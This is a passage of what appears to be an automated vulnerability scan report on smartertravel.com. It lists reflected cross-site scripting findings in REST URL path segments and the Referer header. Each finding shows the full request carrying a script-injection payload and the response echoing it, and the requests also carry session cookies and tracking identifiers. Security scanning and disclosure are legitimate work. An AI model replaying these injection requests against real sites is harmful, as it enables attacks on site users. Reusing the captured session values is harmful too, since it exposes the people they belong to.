User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; o_prvchan=Compare+Prices+%7C+Vacation+Packages; entry_time=time; s_cc=true; s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_sq=%5B%5BB%5D%5D; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; iploc=Dallas, TX (DFW)

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 22:00:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 22:00:12 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 22:00:12 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 22:00:12 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 28130

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/xd_receiver.htmcea01<script>alert(1)</script>64c7de2e46</p>
...[SNIP]...

2.96. http://www.smartertravel.com/xml/rss/deals.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /xml/rss/deals.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c2581<script>alert(1)</script>95e99f81f47 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xmlc2581<script>alert(1)</script>95e99f81f47/rss/deals.php HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 20:56:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 20:57:09 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 20:57:09 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 20:57:09 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27789

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/xmlc2581<script>alert(1)</script>95e99f81f47/rss/deals.php</p>
...[SNIP]...

2.97. http://www.smartertravel.com/xml/rss/deals.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /xml/rss/deals.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c9306<script>alert(1)</script>6d17a421ca6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xml/rssc9306<script>alert(1)</script>6d17a421ca6/deals.php HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 20:58:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 20:58:47 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 20:58:47 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 20:58:47 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27647

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/xml/rssc9306<script>alert(1)</script>6d17a421ca6/deals.php</p>
...[SNIP]...

2.98. http://www.smartertravel.com/xml/rss/deals.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /xml/rss/deals.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload fa2ec<script>alert(1)</script>d11e85c4a92 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xml/rss/deals.phpfa2ec<script>alert(1)</script>d11e85c4a92 HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 20:59:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:01:17 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:01:17 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 21:01:17 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27633

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/xml/rss/deals.phpfa2ec<script>alert(1)</script>d11e85c4a92</p>
...[SNIP]...

2.99. http://www.smartertravel.com/airfare/Learn-taxes-fees-increase.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /airfare/Learn-taxes-fees-increase.html

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload adaca<script>alert(1)</script>0d594738c64 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /airfare/Learn-taxes-fees-increase.html HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;
Referer: http://www.google.com/search?hl=en&q=adaca<script>alert(1)</script>0d594738c64

Response

HTTP/1.0 404 Not Found
Date: Sat, 13 Nov 2010 21:55:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:55:15 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:55:15 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 21:55:15 GMT; path=/; domain=.smartertravel.com
Set-Cookie: referrer=org_google.com_adaca%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3B0d594738c64%3A%3A%3A%3A%3A%3A1289685316%3A%3A%3A; expires=Thu, 18-Nov-2010 21:55:16 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.google.com/search?hl=en&q=adaca<script>alert(1)</script>0d594738c64</p>
...[SNIP]...

2.100. http://www.smartertravel.com/travel-guides/amsterdam-travel-guide.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /travel-guides/amsterdam-travel-guide.html

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 5f06a<script>alert(1)</script>fd94900ad1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /travel-guides/amsterdam-travel-guide.html HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;
Referer: http://www.google.com/search?hl=en&q=5f06a<script>alert(1)</script>fd94900ad1

Response

HTTP/1.0 404 Not Found
Date: Sat, 13 Nov 2010 21:59:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:59:19 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:59:19 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 21:59:19 GMT; path=/; domain=.smartertravel.com
Set-Cookie: referrer=org_google.com_5f06a%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3Bfd94900ad1%3A%3A%3A%3A%3A%3A1289685560%3A%3A%3A; expires=Thu, 18-Nov-2010 21:59:20 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.google.com/search?hl=en&q=5f06a<script>alert(1)</script>fd94900ad1</p>
...[SNIP]...

2.101. http://www.smartertravel.com/travel-guides/boston-travel-guide.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /travel-guides/boston-travel-guide.html

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload a1363<script>alert(1)</script>e73ceaa5f7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /travel-guides/boston-travel-guide.html HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;
Referer: http://www.google.com/search?hl=en&q=a1363<script>alert(1)</script>e73ceaa5f7

Response

HTTP/1.0 404 Not Found
Date: Sat, 13 Nov 2010 22:04:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 22:04:35 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 22:04:35 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 22:04:35 GMT; path=/; domain=.smartertravel.com
Set-Cookie: referrer=org_google.com_a1363%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3Be73ceaa5f7%3A%3A%3A%3A%3A%3A1289685876%3A%3A%3A; expires=Thu, 18-Nov-2010 22:04:36 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.google.com/search?hl=en&q=a1363<script>alert(1)</script>e73ceaa5f7</p>
...[SNIP]...

2.102. http://www.smartertravel.com/travel-guides/chattanooga-travel-guide.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /travel-guides/chattanooga-travel-guide.html

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload defa1<script>alert(1)</script>ca4ce79ebba was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /travel-guides/chattanooga-travel-guide.html HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;
Referer: http://www.google.com/search?hl=en&q=defa1<script>alert(1)</script>ca4ce79ebba

Response

HTTP/1.0 404 Not Found
Date: Sat, 13 Nov 2010 21:49:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:49:34 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:49:34 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 21:49:34 GMT; path=/; domain=.smartertravel.com
Set-Cookie: referrer=org_google.com_defa1%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3Bca4ce79ebba%3A%3A%3A%3A%3A%3A1289684975%3A%3A%3A; expires=Thu, 18-Nov-2010 21:49:35 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.google.com/search?hl=en&q=defa1<script>alert(1)</script>ca4ce79ebba</p>
...[SNIP]...

2.103. http://www.smartertravel.com/travel-guides/chicago-travel-guide.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /travel-guides/chicago-travel-guide.html

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload fe426<script>alert(1)</script>a2398847bff was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /travel-guides/chicago-travel-guide.html HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
